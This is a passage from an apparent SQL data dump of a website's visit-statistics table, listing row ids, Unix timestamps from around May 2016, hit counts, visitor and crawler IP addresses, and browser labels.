,'40.77.167.45','other'),(40147,1463738686,1,1,0,0,'91.196.178.135','firefox'),(40148,1463738751,1,1,0,0,'207.46.13.184','other'),(40149,1463738829,1,1,0,0,'141.8.183.25','other'),(40150,1463739017,1,1,0,0,'5.58.77.63','chrome'),(40151,1463739829,1,1,0,0,'46.200.120.218','chrome'),(40152,1463740267,1,1,0,0,'91.196.178.70','firefox'),(40153,1463740430,1,0,1,0,'66.249.66.54',''),(40154,1463740496,1,1,0,0,'91.196.178.67','chrome'),(40155,1463740652,2,0,2,0,'66.249.66.79',''),(40156,1463741145,1,1,0,0,'207.46.13.184','other'),(40157,1463741454,1,1,0,0,'207.46.13.176','other'),(40158,1463741548,1,1,0,0,'91.196.178.135','firefox'),(40159,1463741676,1,0,1,0,'66.249.66.76',''),(40160,1463742385,1,1,0,0,'141.8.183.25','other'),(40161,1463744294,1,1,0,0,'130.193.51.19','other'),(40162,1463744727,1,1,0,0,'37.53.230.73','firefox'),(40163,1463745046,1,1,0,0,'91.196.178.67','firefox'),(40164,1463745070,1,1,0,0,'130.193.50.34','other'),(40165,1463745489,1,1,0,0,'91.196.178.69','firefox'),(40166,1463745694,1,1,0,0,'130.193.51.83','other'),(40167,1463745834,1,1,0,0,'141.8.132.105','other'),(40168,1463747402,1,0,1,0,'66.249.69.170',''),(40169,1463747403,1,1,0,0,'91.196.178.69','firefox'),(40170,1463747459,2,2,0,0,'141.8.132.105','other'),(40171,1463747578,2,2,0,0,'207.46.13.184','other'),(40172,1463748700,4,4,0,0,'37.53.226.65','chrome'),(40173,1463749732,2,2,0,0,'141.8.132.105','other'),(40174,1463750035,1,1,0,0,'40.77.167.45','other'),(40175,1463750367,1,1,0,0,'141.8.183.25','other'),(40176,1463750440,1,1,0,0,'207.46.13.184','other'),(40177,1463750899,1,1,0,0,'91.196.178.66','chrome'),(40178,1463751745,1,1,0,0,'91.196.178.135','firefox'),(40179,1463753667,1,1,0,0,'157.55.39.251','other'),(40180,1463753769,1,1,0,0,'207.46.13.184','other'),(40181,1463753847,1,1,0,0,'91.196.178.39','chrome'),(40182,1463754022,1,1,0,0,'130.193.50.34','other'),(40183,1463754429,1,1,0,0,'91.196.178.70','firefox'),(40184,1463754862,1,1,0,0,'91.196.178.72','chrome'),(40185,1463755335,1,1,0,0,'207.46.13.176','other'),(40186,1463755987,1,1,0,0,'40.77.167.45','other'),(40187,1463756418,1,0,1,0,'66.249.66.60',''),(40188,1463756453,1,1,0,0,'141.8.183.25','other'),(40189,1463756949,1,0,1,0,'66.249.66.57',''),(40190,1463756988,1,0,1,0,'66.249.66.54',''),(40191,1463757628,1,1,0,0,'5.255.253.53','other'),(40192,1463757762,1,1,0,0,'141.8.132.10','other'),(40193,1463757919,3,3,0,0,'207.46.13.184','other'),(40194,1463758342,1,1,0,0,'130.193.50.34','other'),(40195,1463758345,1,0,1,0,'66.249.69.170',''),(40196,1463758649,1,1,0,0,'94.178.7.175','firefox'),(40197,1463758842,1,0,1,0,'66.249.69.180',''),(40198,1463758890,1,1,0,0,'157.55.39.251','other'),(40199,1463760031,1,1,0,0,'207.46.13.176','other'),(40200,1463760207,1,1,0,0,'157.55.39.251','other'),(40201,1463760297,3,0,3,0,'66.249.69.180',''),(40202,1463760328,1,1,0,0,'178.154.189.202','other'),(40203,1463760332,1,1,0,0,'207.46.13.184','other'),(40204,1463760506,1,1,0,0,'130.180.210.252','chrome'),(40205,1463760603,1,0,1,0,'66.249.75.32',''),(40206,1463761788,1,0,1,0,'66.249.69.180',''),(40207,1463762108,1,1,0,0,'141.8.132.105','other'),(40208,1463762716,2,0,2,0,'66.249.69.175',''),(40209,1463762844,1,1,0,0,'66.249.75.40','chrome'),(40210,1463762874,1,1,0,0,'178.154.189.203','other'),(40211,1463763326,2,2,0,0,'5.255.253.113','other'),(40212,1463763333,1,1,0,0,'157.55.39.251','other'),(40213,1463763391,3,3,0,0,'40.77.167.45','other'),(40214,1463763697,1,0,1,0,'66.249.69.180',''),(40215,1463763984,1,1,0,0,'66.249.69.180','chrome'),(40216,1463764029,1,0,1,0,'66.249.75.32',''),(40217,1463764824,1,1,0,0,'207.46.13.176','other'),(40218,1463764849,1,0,1,0,'66.249.69.175',''),(40219,1463766226,1,1,0,0,'94.178.7.175','firefox'),(40220,1463767048,1,1,0,0,'91.196.178.134','chrome'),(40221,1463767761,1,1,0,0,'130.193.50.34','other'),(40222,1463768350,2,2,0,0,'207.46.13.184','other'),(40223,1463768497,1,1,0,0,'207.46.13.176','other'),(40224,1463768644,1,1,0,0,'130.180.210.252','chrome'),(40225,1463768737,1,1,0,0,'157.55.39.251','other'),(40226,1463769692,1,1,0,0,'130.180.210.252','chrome'),(40227,1463769905,1,1,0,0,'37.73.234.4','chrome'),(40228,1463769921,1,1,0,0,'130.193.50.34','other'),(40229,1463770607,1,1,0,0,'141.8.183.25','other'),(40230,1463770831,1,1,0,0,'207.46.13.176','other'),(40231,1463771001,1,1,0,0,'40.77.167.45','other'),(40232,1463771433,1,1,0,0,'141.8.132.105','other'),(40233,1463771578,1,1,0,0,'130.193.50.34','other'),(40234,1463772522,1,1,0,0,'141.8.183.25','other'),(40235,1463772812,1,1,0,0,'40.77.167.45','other'),(40236,1463773791,1,1,0,0,'130.193.50.34','other'),(40237,1463773885,1,1,0,0,'207.46.13.176','other'),(40238,1463774051,2,2,0,0,'130.193.51.83','other'),(40239,1463774221,1,1,0,0,'40.77.167.45','other'),(40240,1463774265,1,1,0,0,'5.255.253.53','other'),(40241,1463774390,1,1,0,0,'130.193.51.19','other'),(40242,1463774750,1,1,0,0,'141.8.142.61','other'),(40243,1463775175,1,0,1,0,'66.249.69.170',''),(40244,1463775393,1,0,1,0,'66.249.75.40',''),(40245,1463775448,1,1,0,0,'40.77.167.45','other'),(40246,1463775650,1,1,0,0,'69.30.198.202','other'),(40247,1463776443,1,1,0,0,'207.46.13.176','other'),(40248,1463776472,3,3,0,0,'157.55.39.251','other'),(40249,1463777379,1,1,0,0,'141.8.183.25','other'),(40250,1463777380,1,1,0,0,'5.255.253.113','other'),(40251,1463777505,1,1,0,0,'130.193.51.83','other'),(40252,1463777895,1,1,0,0,'130.193.50.34','other'),(40253,1463777944,1,1,0,0,'178.154.189.202','other'),(40254,1463777962,3,3,0,0,'51.254.131.242','other'),(40255,1463778033,1,1,0,0,'40.77.167.45','other'),(40256,1463779470,1,0,1,0,'66.249.75.40',''),(40257,1463780955,2,2,0,0,'40.77.167.45','other'),(40258,1463780970,1,1,0,0,'141.8.132.105','other'),(40259,1463781439,1,0,1,0,'66.249.75.48',''),(40260,1463781539,2,2,0,0,'207.46.13.176','other'),(40261,1463782016,1,0,1,0,'66.249.69.175',''),(40262,1463783017,1,0,1,0,'66.249.69.170',''),(40263,1463784947,1,1,0,0,'141.8.132.105','other'),(40264,1463785781,1,1,0,0,'40.77.167.45','other'),(40265,1463787762,1,1,0,0,'207.46.13.176','other'),(40266,1463788640,1,1,0,0,'207.46.13.184','other'),(40267,1463788699,1,1,0,0,'130.193.50.34','other'),(40268,1463788800,1,1,0,0,'176.14.77.106','msie'),(40269,1463788892,1,1,0,0,'157.55.39.251','other'),(40270,1463789029,1,1,0,0,'5.255.253.113','other'),(40271,1463789382,1,0,1,0,'66.249.75.48',''),(40272,1463789642,1,1,0,0,'130.193.50.34','other'),(40273,1463789863,1,0,1,0,'66.249.69.170',''),(40274,1463791788,1,0,1,0,'66.249.75.40',''),(40275,1463792169,1,1,0,0,'207.46.13.184','other'),(40276,1463792758,1,1,0,0,'46.251.79.251','msie'),(40277,1463793246,1,1,0,0,'207.46.13.176','other'),(40278,1463793885,1,0,1,0,'66.249.75.40',''),(40279,1463794147,1,1,0,0,'187.40.76.35','other'),(40280,1463795726,1,1,0,0,'207.46.13.184','other'),(40281,1463796329,1,1,0,0,'157.55.39.251','other'),(40282,1463798315,1,1,0,0,'207.46.13.176','other'),(40283,1463798345,1,1,0,0,'207.46.13.184','other'),(40284,1463798390,1,1,0,0,'157.55.39.251','other'),(40285,1463799371,1,1,0,0,'40.77.167.45','other'),(40286,1463800776,1,0,1,0,'66.249.75.32',''),(40287,1463800845,1,1,0,0,'207.46.13.176','other'),(40288,1463802202,1,1,0,0,'66.249.69.175','chrome'),(40289,1463803641,1,0,1,0,'66.249.69.180',''),(40290,1463804151,1,1,0,0,'207.46.13.176','other'),(40291,1463805000,1,1,0,0,'141.8.132.105','other'),(40292,1463805604,1,1,0,0,'207.46.13.184','other'),(40293,1463806816,1,1,0,0,'157.55.39.251','other'),(40294,1463806975,2,2,0,0,'69.30.215.26','other'),(40295,1463807129,1,1,0,0,'207.46.13.176','other'),(40296,1463808051,1,0,1,0,'66.249.69.180',''),(40297,1463808536,1,0,1,0,'66.249.75.48',''),(40298,1463808552,2,1,1,0,'66.249.69.175',''),(40299,1463809875,1,1,0,0,'157.55.39.251','other'),(40300,1463810446,1,1,0,0,'40.77.167.45','other'),(40301,1463810609,1,0,1,0,'66.249.69.170',''),(40302,1463810949,1,1,0,0,'207.46.13.176','other'),(40303,1463811252,1,1,0,0,'141.8.183.25','other'),(40304,1463812547,1,1,0,0,'40.77.167.45','other'),(40305,1463812643,1,1,0,0,'95.134.202.215','chrome'),(40306,1463813626,1,1,0,0,'66.249.93.147','chrome'),(40307,1463814066,1,1,0,0,'130.193.50.34','other'),(40308,1463814323,1,1,0,0,'94.179.5.238','firefox'),(40309,1463814437,1,1,0,0,'91.196.178.135','firefox'),(40310,1463814687,2,2,0,0,'40.77.167.45','other'),(40311,1463814869,1,1,0,0,'157.55.39.251','other'),(40312,1463815032,1,1,0,0,'78.111.190.231','chrome'),(40313,1463815393,1,1,0,0,'207.46.13.176','other'),(40314,1463815890,1,1,0,0,'91.196.178.161','firefox'),(40315,1463815963,2,2,0,0,'95.134.203.6','chrome'),(40316,1463816659,1,1,0,0,'157.55.39.251','other'),(40317,1463816989,1,1,0,0,'40.77.167.45','other'),(40318,1463816995,2,2,0,0,'66.249.69.180','chrome'),(40319,1463817745,1,1,0,0,'130.193.50.34','other'),(40320,1463818744,1,1,0,0,'157.55.39.251','other'),(40321,1463820390,12,12,0,0,'40.77.167.45','other'),(40322,1463820650,1,0,1,0,'66.249.69.175',''),(40323,1463821197,10,10,0,0,'157.55.39.251','other'),(40324,1463821208,9,9,0,0,'207.46.13.176','other'),(40325,1463821358,1,0,1,0,'66.249.69.170',''),(40326,1463821800,1,1,0,0,'180.76.15.30','other'),(40327,1463822327,3,3,0,0,'207.46.13.163','other'),(40328,1463822850,1,0,1,0,'66.249.75.48',''),(40329,1463822852,1,0,1,0,'66.249.69.175',''),(40330,1463823626,1,1,0,0,'207.46.13.64','other'),(40331,1463825221,1,1,0,0,'141.8.183.25','other'),(40332,1463825708,1,1,0,0,'40.77.167.45','other'),(40333,1463825795,1,1,0,0,'178.140.233.170','chrome'),(40334,1463825797,1,1,0,0,'46.42.172.164','chrome'),(40335,1463825798,1,1,0,0,'93.80.0.84','opera'),(40336,1463825801,1,1,0,0,'188.244.37.205','chrome'),(40337,1463825802,1,1,0,0,'95.220.187.98','firefox'),(40338,1463825819,1,1,0,0,'180.76.15.21','other'),(40339,1463825821,1,1,0,0,'180.76.15.5','other'),(40340,1463826753,1,1,0,0,'157.55.39.251','other'),(40341,1463827996,1,1,0,0,'207.46.13.64','other'),(40342,1463828154,1,1,0,0,'157.55.39.251','other'),(40343,1463828538,10,10,0,0,'69.58.178.57','firefox'),(40344,1463828984,2,2,0,0,'207.46.13.64','other'),(40345,1463828999,1,1,0,0,'207.46.13.176','other'),(40346,1463829882,1,0,1,0,'66.249.69.175',''),(40347,1463830855,1,1,0,0,'207.46.13.176','other'),(40348,1463831930,1,0,1,0,'66.249.69.170',''),(40349,1463832319,1,1,0,0,'157.55.39.241','other'),(40350,1463832514,1,1,0,0,'40.77.167.45','other'),(40351,1463833508,1,1,0,0,'157.55.39.241','other'),(40352,1463833894,1,1,0,0,'91.124.239.204','firefox'),(40353,1463834093,1,1,0,0,'207.46.13.64','other'),(40354,1463834852,1,1,0,0,'207.46.13.176','other'),(40355,1463837159,1,1,0,0,'157.55.39.251','other'),(40356,1463837172,1,1,0,0,'91.207.105.29','other'),(40357,1463837459,1,0,1,0,'66.249.69.180',''),(40358,1463838478,1,0,1,0,'66.249.75.32',''),(40359,1463839016,1,1,0,0,'130.180.218.245','chrome'),(40360,1463839031,1,1,0,0,'5.255.253.113','other'),(40361,1463840417,1,1,0,0,'157.55.39.241','other'),(40362,1463844287,1,0,1,0,'66.249.69.175',''),(40363,1463845594,1,1,0,0,'157.55.39.241','other'),(40364,1463845768,2,2,0,0,'207.46.13.64','other'),(40365,1463847529,1,1,0,0,'157.55.39.241','other'),(40366,1463847571,1,1,0,0,'207.46.13.176','other'),(40367,1463848498,1,1,0,0,'130.193.50.34','other'),(40368,1463849440,1,0,1,0,'66.249.64.108',''),(40369,1463849661,1,1,0,0,'157.55.39.241','other'),(40370,1463849831,1,1,0,0,'91.196.178.65','firefox'),(40371,1463850149,1,0,1,0,'66.249.64.118',''),(40372,1463850544,1,1,0,0,'141.0.12.139','chrome'),(40373,1463850560,1,1,0,0,'5.255.253.67','other'),(40374,1463851205,1,1,0,0,'5.255.253.113','other'),(40375,1463851332,1,1,0,0,'130.193.50.34','other'),(40376,1463851457,1,1,0,0,'141.8.183.25','other'),(40377,1463851878,1,0,1,0,'66.249.64.224',''),(40378,1463852638,1,1,0,0,'95.132.237.156','chrome'),(40379,1463853424,1,1,0,0,'130.193.51.83','other'),(40380,1463853604,1,1,0,0,'130.193.50.34','other'),(40381,1463854411,1,1,0,0,'91.196.178.161','chrome'),(40382,1463855979,1,1,0,0,'207.46.13.64','other'),(40383,1463856552,1,1,0,0,'207.46.13.176','other'),(40384,1463858933,1,1,0,0,'157.55.39.251','other'),(40385,1463858949,1,1,0,0,'207.46.13.64','other'),(40386,1463860521,1,1,0,0,'66.249.64.244','chrome'),(40387,1463860569,1,1,0,0,'130.193.50.34','other'),(40388,1463860613,1,1,0,0,'157.55.39.251','other'),(40389,1463860855,1,1,0,0,'157.55.39.241','other'),(40390,1463862031,1,1,0,0,'157.55.39.251','other'),(40391,1463862049,1,1,0,0,'66.249.64.239','chrome'),(40392,1463862847,3,3,0,0,'81.162.219.1','other'),(40393,1463864546,2,2,0,0,'130.193.50.34','other'),(40394,1463864548,2,2,0,0,'157.55.39.241','other'),(40395,1463865512,1,1,0,0,'157.55.39.241','other'),(40396,1463867096,1,1,0,0,'93.158.152.40','other'),(40397,1463867281,1,1,0,0,'207.46.13.176','other'),(40398,1463867342,1,1,0,0,'157.55.39.251','other'),(40399,1463867466,3,3,0,0,'207.46.13.64','other'),(40400,1463867875,6,6,0,0,'157.55.39.241','other'),(40401,1463868089,1,1,0,0,'180.76.15.138','other'),(40402,1463868434,1,1,0,0,'207.46.13.64','other'),(40403,1463870443,1,0,1,0,'66.249.64.244',''),(40404,1463870638,1,0,1,0,'66.249.64.113',''),(40405,1463870779,1,1,0,0,'207.46.13.176','other'),(40406,1463870794,1,1,0,0,'130.193.50.34','other'),(40407,1463871052,1,1,0,0,'207.46.13.64','other'),(40408,1463871059,2,2,0,0,'157.55.39.199','other'),(40409,1463871595,1,1,0,0,'213.109.239.160','chrome'),(40410,1463873872,1,1,0,0,'207.46.13.176','other'),(40411,1463873879,1,1,0,0,'178.154.189.202','other'),(40412,1463874770,2,2,0,0,'141.8.142.58','other'),(40413,1463874896,1,1,0,0,'130.193.51.19','other'),(40414,1463875276,1,1,0,0,'176.36.80.39','other'),(40415,1463876593,1,0,1,0,'66.249.64.180',''),(40416,1463877140,1,1,0,0,'207.46.13.150','other'),(40417,1463877410,1,0,1,0,'66.249.64.108',''),(40418,1463878124,1,1,0,0,'40.77.167.12','other'),(40419,1463878180,1,0,1,0,'66.249.64.239',''),(40420,1463878390,1,0,1,0,'66.249.64.108',''),(40421,1463878492,1,1,0,0,'141.8.183.25','other'),(40422,1463878789,1,1,0,0,'5.255.253.113','other'),(40423,1463879771,1,0,1,0,'66.249.64.249',''),(40424,1463881166,1,1,0,0,'40.77.167.12','other'),(40425,1463882157,1,1,0,0,'207.46.13.64','other'),(40426,1463882716,1,1,0,0,'141.8.132.2','other'),(40427,1463884039,1,1,0,0,'157.55.39.241','other'),(40428,1463884474,3,3,0,0,'85.14.244.98','other'),(40429,1463884475,1,1,0,0,'85.14.244.113','other'),(40430,1463884597,1,1,0,0,'40.77.167.12','other'),(40431,1463885041,1,0,1,0,'66.249.64.108',''),(40432,1463885236,1,1,0,0,'207.46.13.150','other'),(40433,1463885666,1,1,0,0,'180.76.15.134','other'),(40434,1463886004,1,1,0,0,'66.249.64.118','chrome'),(40435,1463886336,1,1,0,0,'5.255.253.47','other'),(40436,1463886339,1,1,0,0,'141.8.142.67','other'),(40437,1463886750,1,1,0,0,'128.74.244.76','chrome'),(40438,1463886751,1,1,0,0,'213.191.24.115','firefox'),(40442,1463886967,4,4,0,0,'91.200.12.114','msie'),(40443,1463888107,1,1,0,0,'207.46.13.150','other'),(40444,1463888590,2,2,0,0,'158.69.214.11','other'),(40445,1463888774,1,0,1,0,'66.249.64.244',''),(40446,1463889428,1,0,1,0,'66.249.64.108',''),(40447,1463890858,15,0,15,0,'68.180.231.33',''),(40448,1463891804,3,0,3,0,'68.180.231.33',''),(40449,1463892121,1,1,0,0,'91.124.239.204','other'),(40450,1463892615,1,1,0,0,'207.46.13.150','other'),(40451,1463893103,1,0,1,0,'68.180.231.33',''),(40452,1463893413,1,1,0,0,'157.55.39.241','other'),(40453,1463893673,1,1,0,0,'37.52.17.11','chrome'),(40454,1463894548,1,1,0,0,'157.55.39.241','other'),(40455,1463894770,2,2,0,0,'207.46.13.150','other'),(40456,1463895074,1,1,0,0,'66.249.64.118','chrome'),(40457,1463895094,1,1,0,0,'66.249.64.108','chrome'),(40458,1463895102,1,0,1,0,'68.180.231.33',''),(40459,1463896345,1,1,0,0,'207.46.13.93','other'),(40460,1463896705,1,1,0,0,'141.8.183.25','other'),(40461,1463896828,2,0,2,0,'66.249.64.113',''),(40462,1463897009,1,1,0,0,'141.8.132.30','other'),(40463,1463897905,1,1,0,0,'207.46.13.93','other'),(40464,1463897962,1,1,0,0,'207.46.13.150','other'),(40465,1463899102,2,2,0,0,'207.46.13.93','other'),(40466,1463900493,1,1,0,0,'5.255.253.26','other'),(40467,1463900749,1,1,0,0,'5.255.253.47','other'),(40468,1463901944,1,1,0,0,'66.249.93.153','chrome'),(40469,1463902286,1,1,0,0,'207.46.13.72','other'),(40470,1463903737,1,1,0,0,'5.255.253.53','other'),(40471,1463904089,1,1,0,0,'207.46.13.72','other'),(40472,1463904392,1,0,1,0,'66.249.64.239',''),(40473,1463904656,1,0,1,0,'66.249.64.113',''),(40474,1463908351,1,1,0,0,'130.193.50.34','other'),(40475,1463912126,1,1,0,0,'207.46.13.72','other'),(40476,1463912309,1,1,0,0,'66.249.64.118','chrome'),(40477,1463912472,1,0,1,0,'66.249.64.249',''),(40478,1463914398,2,0,2,0,'66.249.64.108',''),(40479,1463916351,1,1,0,0,'157.55.39.241','other'),(40480,1463917219,1,1,0,0,'40.77.167.73','other'),(40481,1463917412,1,0,1,0,'66.249.64.249',''),(40482,1463917532,1,0,1,0,'66.249.64.113',''),(40483,1463918859,1,1,0,0,'178.154.189.202','other'),(40484,1463919549,1,1,0,0,'91.202.129.167','firefox'),(40485,1463921464,1,1,0,0,'157.55.39.241','other'),(40486,1463923433,1,1,0,0,'130.193.50.34','other'),(40487,1463925353,1,1,0,0,'46.182.106.190','chrome'),(40488,1463925466,1,0,1,0,'66.249.64.118',''),(40489,1463925654,1,1,0,0,'91.124.239.204','firefox'),(40490,1463926010,1,1,0,0,'157.55.39.241','other'),(40491,1463926726,1,1,0,0,'130.193.50.34','other'),(40492,1463926933,1,1,0,0,'157.55.39.241','other'),(40493,1463927920,1,1,0,0,'81.88.62.2','other'),(40495,1463927921,1,1,0,0,'81.88.62.2','chrome'),(40496,1463928763,2,0,2,0,'66.249.66.76',''),(40497,1463931065,1,1,0,0,'40.77.167.82','other'),(40498,1463931367,1,1,0,0,'157.55.39.241','other'),(40499,1463932647,1,1,0,0,'178.94.172.185','chrome'),(40500,1463932902,1,0,1,0,'66.249.66.82',''),(40501,1463933763,1,1,0,0,'91.196.178.69','chrome'),(40502,1463934178,1,1,0,0,'40.77.167.73','other'),(40503,1463934298,1,1,0,0,'40.77.167.82','other'),(40504,1463934546,2,2,0,0,'178.94.65.218','chrome'),(40505,1463936585,2,2,0,0,'178.94.65.218','chrome'),(40506,1463936684,1,1,0,0,'178.154.189.203','other'),(40507,1463936785,1,1,0,0,'141.0.12.142','chrome'),(40508,1463937051,1,1,0,0,'40.77.167.73','other'),(40509,1463937180,1,1,0,0,'8.37.231.89','other'),(40510,1463939157,1,1,0,0,'207.46.13.72','other'),(40511,1463940054,1,1,0,0,'94.179.120.207','firefox'),(40512,1463940411,3,3,0,0,'91.124.239.204','firefox'),(40513,1463940848,1,1,0,0,'207.46.13.188','other'),(40514,1463941739,1,1,0,0,'40.77.167.82','other'),(40515,1463944019,1,1,0,0,'91.196.178.65','chrome'),(40516,1463944556,1,1,0,0,'207.46.13.188','other'),(40517,1463945766,1,1,0,0,'40.77.167.82','other'),(40518,1463945865,1,1,0,0,'176.126.162.35','chrome'),(40519,1463946303,1,1,0,0,'91.124.239.204','other'),(40520,1463946842,1,0,1,0,'66.249.66.54',''),(40521,1463947077,1,1,0,0,'130.193.50.34','other'),(40522,1463947804,1,1,0,0,'157.55.39.241','other'),(40523,1463947935,1,0,1,0,'66.249.66.76',''),(40524,1463950782,1,1,0,0,'130.193.51.83','other'),(40525,1463951346,1,1,0,0,'40.77.167.82','other'),(40526,1463952919,1,1,0,0,'207.46.13.72','other'),(40527,1463954446,2,0,2,0,'66.249.66.79',''),(40528,1463954548,1,1,0,0,'207.46.13.188','other'),(40529,1463954742,1,1,0,0,'157.55.39.241','other'),(40530,1463954998,1,0,1,0,'66.249.66.63',''),(40531,1463955085,1,0,1,0,'66.249.66.60',''),(40532,1463956107,1,1,0,0,'207.46.13.72','other'),(40533,1463957633,1,0,1,0,'66.249.66.79',''),(40534,1463959781,1,1,0,0,'176.195.250.47','msie'),(40535,1463959783,1,1,0,0,'37.204.39.186','msie'),(40536,1463959784,1,1,0,0,'176.195.17.39','msie'),(40537,1463959785,1,1,0,0,'176.77.25.56','msie'),(40538,1463959786,1,1,0,0,'95.28.77.227','msie'),(40539,1463960171,1,0,1,0,'66.249.66.82',''),(40540,1463960200,1,1,0,0,'178.154.189.202','other'),(40541,1463960672,1,0,1,0,'66.249.66.60',''),(40542,1463961307,1,0,1,0,'66.249.66.76',''),(40543,1463961997,1,1,0,0,'178.154.189.202','other'),(40544,1463962327,1,0,1,0,'66.249.66.82',''),(40545,1463965356,1,1,0,0,'207.46.13.72','other'),(40546,1463969201,1,1,0,0,'5.255.253.113','other'),(40547,1463969258,1,0,1,0,'66.249.66.57',''),(40548,1463969630,1,1,0,0,'141.8.183.25','other'),(40549,1463973894,1,0,1,0,'66.249.66.54',''),(40550,1463976656,1,0,1,0,'66.249.66.76',''),(40551,1463978415,1,1,0,0,'207.46.13.72','other'),(40552,1463979708,2,2,0,0,'141.8.132.105','other'),(40553,1463981282,1,1,0,0,'66.102.9.93','chrome'),(40554,1463981298,1,1,0,0,'91.196.178.69','firefox'),(40555,1463981547,1,1,0,0,'91.196.178.67','chrome'),(40556,1463983211,1,1,0,0,'141.8.183.25','other'),(40557,1463983737,1,1,0,0,'94.179.127.238','firefox'),(40558,1463984003,1,1,0,0,'91.196.178.69','firefox'),(40559,1463984785,1,1,0,0,'46.201.142.103','other'),(40560,1463985497,1,1,0,0,'40.77.167.82','other'),(40561,1463986497,1,1,0,0,'94.179.123.101','firefox'),(40562,1463986784,1,1,0,0,'82.207.91.234','firefox'),(40563,1463987050,1,1,0,0,'141.8.132.105','other'),(40564,1463987915,1,1,0,0,'130.193.50.34','other'),(40565,1463988047,1,1,0,0,'207.46.13.72','other'),(40566,1463988168,1,1,0,0,'91.196.178.66','firefox'),(40567,1463988736,1,1,0,0,'193.84.22.2','chrome'),(40568,1463991071,1,1,0,0,'141.8.183.25','other'),(40569,1463991248,1,1,0,0,'180.76.15.19','other'),(40570,1463991377,1,0,1,0,'66.249.66.57',''),(40571,1463991611,2,2,0,0,'91.211.132.17','firefox'),(40572,1463991705,1,1,0,0,'91.196.178.166','chrome'),(40573,1463992374,1,1,0,0,'130.193.50.34','other'),(40574,1463992467,1,1,0,0,'93.88.61.96','chrome'),(40575,1463992815,1,1,0,0,'141.8.142.67','other'),(40576,1463993142,1,1,0,0,'94.179.6.190','chrome'),(40577,1463993668,1,1,0,0,'178.93.26.197','chrome'),(40578,1463994206,1,1,0,0,'5.255.253.113','other'),(40579,1463995178,1,1,0,0,'66.249.66.54','chrome'),(40580,1463995258,1,1,0,0,'91.219.144.98','chrome'),(40581,1463995696,1,1,0,0,'94.179.117.10','firefox'),(40582,1463995788,1,1,0,0,'87.76.247.34','firefox'),(40583,1463996383,1,1,0,0,'91.196.178.69','firefox'),(40584,1463996567,1,0,1,0,'66.249.66.79',''),(40585,1463996675,3,3,0,0,'51.255.51.68','other'),(40586,1463997415,1,1,0,0,'91.196.178.72','chrome'),(40587,1463998179,11,11,0,0,'69.30.213.202','other'),(40588,1463998832,100,100,0,0,'69.30.213.18','other'),(40589,1463999204,1,1,0,0,'91.196.178.166','chrome'),(40590,1463999733,194,194,0,0,'69.30.213.18','other'),(40591,1464000441,2,2,0,0,'91.211.132.17','firefox'),(40592,1464000932,1,0,1,0,'66.249.66.54',''),(40593,1464000997,1,1,0,0,'91.196.178.69','chrome'),(40594,1464001242,1,1,0,0,'207.46.13.188','other'),(40595,1464001244,1,1,0,0,'37.54.101.174','opera'),(40596,1464002720,1,1,0,0,'130.193.50.34','other'),(40597,1464003517,1,1,0,0,'157.55.39.241','other'),(40598,1464003633,1,1,0,0,'91.211.132.17','chrome'),(40599,1464003837,1,1,0,0,'141.8.142.58','other'),(40600,1464004023,1,0,1,0,'66.249.66.60',''),(40601,1464004144,1,1,0,0,'91.211.132.17','firefox'),(40602,1464004841,1,1,0,0,'130.193.51.83','other'),(40603,1464005376,1,1,0,0,'37.52.23.53','chrome'),(40604,1464005457,1,1,0,0,'5.58.82.4','firefox'),(40605,1464005564,1,1,0,0,'91.196.178.67','firefox'),(40606,1464005739,1,1,0,0,'178.154.189.202','other'),(40607,1464005990,1,1,0,0,'91.196.178.66','chrome'),(40608,1464006794,1,1,0,0,'91.196.176.13','chrome'),(40609,1464007967,1,1,0,0,'37.53.205.59','chrome'),(40610,1464007990,2,2,0,0,'130.193.50.34','other'),(40611,1464008168,1,1,0,0,'178.94.61.158','firefox'),(40612,1464008520,1,1,0,0,'91.196.178.69','firefox'),(40613,1464008742,1,1,0,0,'37.55.224.182','firefox'),(40614,1464008795,1,1,0,0,'141.8.142.67','other'),(40615,1464008949,1,1,0,0,'5.255.253.36','other'),(40616,1464009136,1,0,1,0,'66.249.66.76',''),(40617,1464009457,1,0,1,0,'66.249.66.60',''),(40618,1464009744,1,0,1,0,'66.249.66.54',''),(40619,1464009938,1,1,0,0,'78.111.185.62','chrome'),(40620,1464010349,1,1,0,0,'66.249.93.153','chrome'),(40621,1464010482,2,2,0,0,'91.196.178.66','firefox'),(40622,1464011053,1,1,0,0,'91.196.178.167','chrome'),(40623,1464012301,1,1,0,0,'141.8.142.67','other'),(40624,1464012952,1,0,1,0,'66.249.66.60',''),(40625,1464013113,1,0,1,0,'66.249.66.79',''),(40626,1464014766,1,1,0,0,'95.133.18.15','chrome'),(40627,1464015731,3,3,0,0,'91.194.84.106','other'),(40628,1464017029,1,1,0,0,'91.196.178.67','firefox'),(40629,1464020845,1,1,0,0,'157.55.39.241','other'),(40630,1464021664,1,0,1,0,'66.249.66.79',''),(40631,1464024017,1,1,0,0,'141.8.142.58','other'),(40632,1464024060,1,1,0,0,'51.254.141.30','other'),(40633,1464025007,1,1,0,0,'207.46.13.188','other'),(40634,1464025016,1,0,1,0,'66.249.66.54',''),(40635,1464025308,1,0,1,0,'66.249.66.60',''),(40636,1464026232,1,1,0,0,'178.94.172.139','chrome'),(40637,1464026893,1,1,0,0,'141.8.132.105','other'),(40638,1464027576,1,1,0,0,'92.113.191.83','firefox'),(40639,1464028104,1,1,0,0,'66.249.66.79','chrome'),(40640,1464028557,1,0,1,0,'66.249.66.60',''),(40641,1464028692,1,1,0,0,'178.92.149.92','firefox'),(40642,1464029548,1,1,0,0,'193.194.127.217','firefox'),(40643,1464030613,1,1,0,0,'37.115.72.239','chrome'),(40644,1464031432,1,1,0,0,'40.77.167.82','other'),(40645,1464032371,3,3,0,0,'85.108.107.128','other'),(40646,1464032926,1,1,0,0,'82.193.127.15','other'),(40647,1464034156,1,1,0,0,'40.77.167.27','other'),(40648,1464034299,1,0,1,0,'66.249.66.79',''),(40649,1464037850,1,0,1,0,'66.249.66.57',''),(40650,1464039072,1,1,0,0,'141.8.183.25','other'),(40651,1464039427,1,0,1,0,'66.249.66.57',''),(40652,1464043893,4,4,0,0,'51.255.51.250','other'),(40653,1464047877,1,1,0,0,'207.46.13.188','other'),(40654,1464048437,21,21,0,0,'108.59.8.80','other'),(40655,1464049688,1,1,0,0,'130.193.51.83','other'),(40656,1464051711,1,1,0,0,'40.77.167.27','other'),(40657,1464053811,1,0,1,0,'66.249.66.57',''),(40658,1464054058,1,0,1,0,'66.249.66.79',''),(40659,1464057080,1,0,1,0,'68.180.231.33',''),(40660,1464060845,1,0,1,0,'66.249.66.76',''),(40661,1464063648,1,1,0,0,'91.196.178.69','chrome'),(40662,1464066216,1,1,0,0,'82.145.220.169','c